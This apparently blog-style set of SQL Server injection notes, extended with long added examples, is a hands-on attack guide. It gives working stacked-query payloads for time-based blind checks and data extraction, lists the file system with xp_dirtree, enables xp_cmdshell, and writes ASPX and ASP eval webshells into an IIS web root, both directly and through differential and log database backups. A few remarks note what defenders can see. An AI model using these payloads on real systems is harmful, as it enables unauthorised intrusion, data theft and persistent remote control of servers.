SQL Server injection notes

Source: Internet
Author: User
Tags: sql server injection

Most large companies run MySQL + PHP + Apache, so Microsoft SQL Server injection comes up comparatively rarely. The useful test ideas and SQL statements that turn up during vulnerability handling or testing are easy to forget, so these SQL Server injection notes are kept here for quick reference.
 
In some blind injection cases, especially when the page returns little or no error information, a statement that executes successfully gives a normal response, while a failure pops up a message such as "server connection timeout", so tables and fields cannot be enumerated through error text. Up front, the checks for db_owner, sysadmin and xp_cmdshell all came back positive, as shown in the screenshot (not reproduced here).


However, sqlmap's --sql-shell could never get an INSERT to work. Testing the INSERT statement directly in the browser later showed that it was failing: sqlmap's --sql-shell has only limited means of judging whether a stacked statement actually executed, and it reports nothing back.
 
1. Statements such as "and 1=1" are often filtered out, so here is SQL Server's time-based injection check (the response is delayed by about five seconds if the injection works):
 
Test.aspx?ID=300 waitfor delay '0:0:5'--
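The privilege checks mentioned at the start and the WAITFOR DELAY probe above, combined into an added example that is not part of the original notes: each check, and a character-extraction query, is turned into a sleep-or-not signal so it works when the page shows no error text at all. It assumes stacked queries on a numeric ID parameter as in the notes; the 5-second threshold and the sys.databases target are choices made here.

```sql
-- Added example, not from the original notes. Assumes stacked queries work on a
-- numeric ID parameter (Test.aspx?ID=300;...) as in the notes; the 5 s delay
-- threshold and the sys.databases target are choices made here.

-- 1. Turn each privilege/feature check into a delay: a ~5 s response means TRUE.
IF IS_SRVROLEMEMBER('sysadmin') = 1
    WAITFOR DELAY '0:0:5';                       -- login is sysadmin
IF IS_MEMBER('db_owner') = 1
    WAITFOR DELAY '0:0:5';                       -- db_owner in the current database
IF (SELECT CAST(value_in_use AS int) FROM sys.configurations
    WHERE name = 'xp_cmdshell') = 1
    WAITFOR DELAY '0:0:5';                       -- xp_cmdshell already enabled

-- 2. Same primitive used to read data one character at a time: sleep iff the
--    character at @pos is greater than @probe. A binary search over the
--    printable range (32..126) costs about seven requests per character.
DECLARE @pos int = 1, @probe int = 77;           -- try character 1 against 'M'
IF ASCII(SUBSTRING((SELECT TOP 1 name FROM sys.databases
                    WHERE database_id > 4          -- skip master/tempdb/model/msdb
                    ORDER BY database_id), @pos, 1)) > @probe
    WAITFOR DELAY '0:0:5';

-- The same conditional as it travels in the URL (no DECLARE, values inlined,
-- and no "and 1=1" for a filter to catch):
-- Test.aspx?ID=300;IF ASCII(SUBSTRING((SELECT TOP 1 name FROM sys.databases WHERE database_id>4 ORDER BY database_id),1,1))>77 WAITFOR DELAY '0:0:5'--
```

Measure the delay against a baseline request first; on a slow or loaded server a 5-second threshold can produce false positives, in which case raise the delay rather than lowering the threshold.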
 
2. Reading the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots through xp_regread was meant to reveal the web root, but it returned null, so instead the C: drive is traversed and the result written into a temporary table. (NOTE: when an extended stored procedure is run through INSERT ... EXEC, the columns of the receiving table must match the procedure's result set in number and type, otherwise it errors out!)
 
Test.aspx?ID=300; create table tmp ([ID] int IDENTITY(300) not null, [name] [nvarchar](260) not null, [depth] [int] not null, [isfile] [nvarchar](50) NULL); insert into tmp exec master..xp_dirtree 'C:/', 1, 1

(The nvarchar length for [name] was lost from the source; 260 is assumed here. INSERT ... EXEC skips the IDENTITY column, so the three remaining columns line up with xp_dirtree's subdirectory, depth and file outputs.)
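An added example that is not part of the original notes, extending the xp_dirtree trick above: the receiving table is declared with the exact three-column shape xp_dirtree returns, the listing goes two levels deep so the web root shows up under inetpub, and the rows are concatenated into one string so a blind or error-based channel needs far fewer requests than dumping the table row by row. It assumes an IIS host on drive C: and working stacked queries; the table name tmp and the LIKE patterns are hypothetical.

```sql
-- Added example, not from the original notes. Assumes IIS on drive C: and
-- stacked queries, as in the notes; tmp and the LIKE patterns are hypothetical.

-- Column types match xp_dirtree's result set (subdirectory, depth, file).
-- INSERT ... EXEC fails if the target table's column count or types differ.
CREATE TABLE tmp (
    [ID]     int IDENTITY(1,1) NOT NULL,   -- preserves xp_dirtree's output order
    [name]   nvarchar(260)     NOT NULL,   -- path component only, no parent path
    [depth]  int               NOT NULL,   -- 1 = direct child of the start path
    [isfile] int               NOT NULL    -- 1 = file, 0 = directory
);

-- Two levels deep, files included; a depth-2 row belongs to the nearest
-- preceding depth-1 row, which is why insertion order matters.
INSERT INTO tmp ([name], [depth], [isfile])
    EXEC master..xp_dirtree 'C:\', 2, 1;

-- Pull only the rows that matter, e.g. candidate web roots
SELECT [ID], [name], [depth]
FROM tmp
WHERE [name] LIKE '%wwwroot%' OR [name] LIKE '%inetpub%'
ORDER BY [ID];

-- Collapse the listing into one string so a blind or error-based channel
-- reads one value instead of one row per request (FOR XML PATH works on any
-- supported version; STRING_AGG would need SQL Server 2017+).
SELECT STUFF((SELECT '|' + [name] + ':' + CAST([depth] AS varchar(3))
                         + ':' + CAST([isfile] AS varchar(1))
              FROM tmp ORDER BY [ID] FOR XML PATH('')), 1, 1, '') AS listing;

-- Error-based read when the page does echo SQL errors: the conversion fails
-- and the error message carries the value ("Conversion failed when
-- converting the nvarchar value 'wwwroot' to data type int.")
SELECT CONVERT(int, (SELECT TOP 1 [name] FROM tmp
                     WHERE [depth] = 2 AND [name] LIKE '%wwwroot%'));

DROP TABLE tmp;
```

The concatenated string can still be read through the WAITFOR DELAY channel one character at a time; the point of collapsing it is that the per-character cost is paid once per string rather than once per row.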
 
Dump the rows of table tmp with sqlmap:
 
Table: dbo.tmp
[11 entries]
+----+---------------------------+-------+--------+
| ID | name                      | depth | isfile |
+----+---------------------------+-------+--------+
| 1  | $Recycle.Bin              | 1     | 0      |
| 10 | Users                     | 1     | 0      |
| 11 | Windows                   | 1     | 0      |
| 2  | Documents and Settings    | 1     | 0      |
| 3  | inetpub                   | 1     | 0      |
| 4  | PerfLogs                  | 1     | 0      |
| 5  | Program Files             | 1     | 0      |
| 6  | Program Files (x86)       | 1     | 0      |
| 7  | ProgramData               | 1     | 0      |
| 8  | Recovery                  | 1     | 0      |
| 9  | System Volume Information | 1     | 0      |
+----+---------------------------+-------+--------+
 
For example, if the site root is the default C:/inetpub/wwwroot, the following command writes a webshell. The angle brackets must be escaped with ^ so that cmd.exe does not treat them as redirection; the final unescaped > is the real redirect into the file:
 
Test.aspx?ID=300; exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript" validateRequest="false" %^>^<% Response.Write(eval(Request.Item["w"],"unsafe")); %^> > C:/inetpub/wwwroot/make.aspx';
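An added example that is not part of the original notes, built around the xp_cmdshell write above: it checks whether xp_cmdshell is enabled and enables it through sp_configure if the login is sysadmin, writes the same make.aspx with the cmd.exe escaping spelled out, and confirms the file landed with xp_fileexist. The paths, the chk table and the parameter name w are assumptions.

```sql
-- Added example, not from the original notes. Assumes sysadmin rights, the
-- default IIS webroot C:\inetpub\wwwroot, the file name make.aspx and the
-- request parameter w, all taken from or assumed for the notes. Run as
-- stacked queries after the injectable ID.

-- 1. Check whether xp_cmdshell is enabled; enable it if not. Needs sysadmin,
--    and 'show advanced options' must be on first. The change is visible in
--    sys.configurations and in the error log, so only do it when the
--    engagement allows it.
IF (SELECT CAST(value_in_use AS int) FROM sys.configurations
    WHERE name = 'xp_cmdshell') = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;          RECONFIGURE;
END;

-- 2. Write the shell. Inside the SQL string only a single quote would need
--    doubling (there is none here). Inside the command, cmd.exe needs ^ in
--    front of < > & | so echo does not see redirections or pipes; the last
--    unescaped > is the real redirect into the file.
EXEC master..xp_cmdshell 'echo ^<%@ Page Language="Jscript" validateRequest="false" %^>^<% Response.Write(eval(Request.Item["w"],"unsafe")); %^> > C:\inetpub\wwwroot\make.aspx';

-- 3. Confirm the file exists without depending on command output.
--    xp_fileexist returns three int columns:
--    "File Exists", "File is a Directory", "Parent Directory Exists".
CREATE TABLE chk ([exists] int, [isdir] int, [parentdir] int);
INSERT INTO chk EXEC master..xp_fileexist 'C:\inetpub\wwwroot\make.aspx';
SELECT [exists] FROM chk;        -- 1 means the shell was written
DROP TABLE chk;
```

If step 3 reports 0 while xp_cmdshell itself ran, the usual cause is that the SQL Server service account has no write permission on the web root; xp_dirtree can then be reused to look for a writable directory that IIS still serves.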
 
In addition, a one-line webshell can be written through a differential database backup. A full backup of the database must already exist, otherwise the differential backup has no base and fails:
 
Test.asp?ID=300; create table [dbo].[dtest] ([cmd] [image]); -- create table dtest with a cmd column of type image; other text types such as text or nvarchar may be converted during the backup (for example to wide characters)
Test.asp?ID=300; insert into dtest (cmd) values (0x3c25657865637574652872657175657374282261222929253e); -- the hex is the one-liner <%execute(request("a"))%>
Test.asp?ID=300; backup database dbname to disk = 'C:/inetpub/wwwroot/d.asp' with differential, FORMAT; -- only the DIFFERENTIAL data is backed up into the .asp file
 
Or write it through a log backup (this also needs an existing full backup so that a log chain exists):
 
Test.asp?ID=300; alter database dbname set recovery full; -- set the database to the FULL recovery model so that log backups are allowed
Test.asp?ID=300; create table cmd (a image);
Test.asp?ID=300; backup log dbname to disk = 'C:\cmd' with init; -- initial log backup; WITH INIT overwrites the file and the backup truncates the existing log so the next one stays small
Test.asp?ID=300; insert into cmd (a) values (0x3c25657865637574652872657175657374282261222929253e); -- insert the one-line shell
Test.asp?ID=300; backup log dbname to disk = 'C:/inetpub/wwwroot/d.asp'; drop table cmd; -- back up the log containing the shell, then drop the table
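Both backup methods above, the differential backup and the log backup, as one added end-to-end example that is not part of the original notes, including the full base backup that both of them require and the notes leave out. It assumes database name dbname, db_owner or higher on it, a SQL Server service account that can write to C:\inetpub\wwwroot, a scratch path C:\Windows\Temp, and the output names d.asp and d2.asp; all of these are hypothetical.

```sql
-- Added example, not from the original notes. Assumes database dbname,
-- db_owner or higher, a service account that can write to C:\inetpub\wwwroot,
-- a scratch path C:\Windows\Temp, and output names d.asp / d2.asp.

-- Both methods need a full backup of the database as a base: a differential
-- backup has nothing to diff against without one, and BACKUP LOG refuses to
-- run when no full backup has started a log chain. Switch to FULL recovery
-- first so the base backup also starts the log chain for method 2.
ALTER DATABASE dbname SET RECOVERY FULL;
BACKUP DATABASE dbname TO DISK = 'C:\Windows\Temp\base.bak' WITH INIT;

-- Method 1: differential backup carrying the shell
CREATE TABLE [dbo].[dtest] ([cmd] image);       -- image: bytes land verbatim, no Unicode widening
INSERT INTO dtest (cmd)
VALUES (0x3c25657865637574652872657175657374282261222929253e);  -- <%execute(request("a"))%>
BACKUP DATABASE dbname TO DISK = 'C:\inetpub\wwwroot\d.asp' WITH DIFFERENTIAL, FORMAT;
DROP TABLE dtest;

-- Method 2: log backup carrying the shell
BACKUP LOG dbname TO DISK = 'C:\Windows\Temp\cmd.trn' WITH INIT;  -- flush the existing log so the next log backup is small
CREATE TABLE cmd (a image);
INSERT INTO cmd (a)
VALUES (0x3c25657865637574652872657175657374282261222929253e);  -- same one-liner
BACKUP LOG dbname TO DISK = 'C:\inetpub\wwwroot\d2.asp';
DROP TABLE cmd;

-- Either file is mostly binary backup headers with the <% %> block embedded;
-- classic ASP executes the block it finds, so request
--   d.asp?a=response.write("ok")
-- to verify. base.bak and cmd.trn in Temp are artefacts to remove afterwards.
```

The recovery-model change and the base backup are the noisy part: both are recorded in msdb.dbo.backupset and the SQL Server error log, which is exactly where a defender would look for this technique.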
 
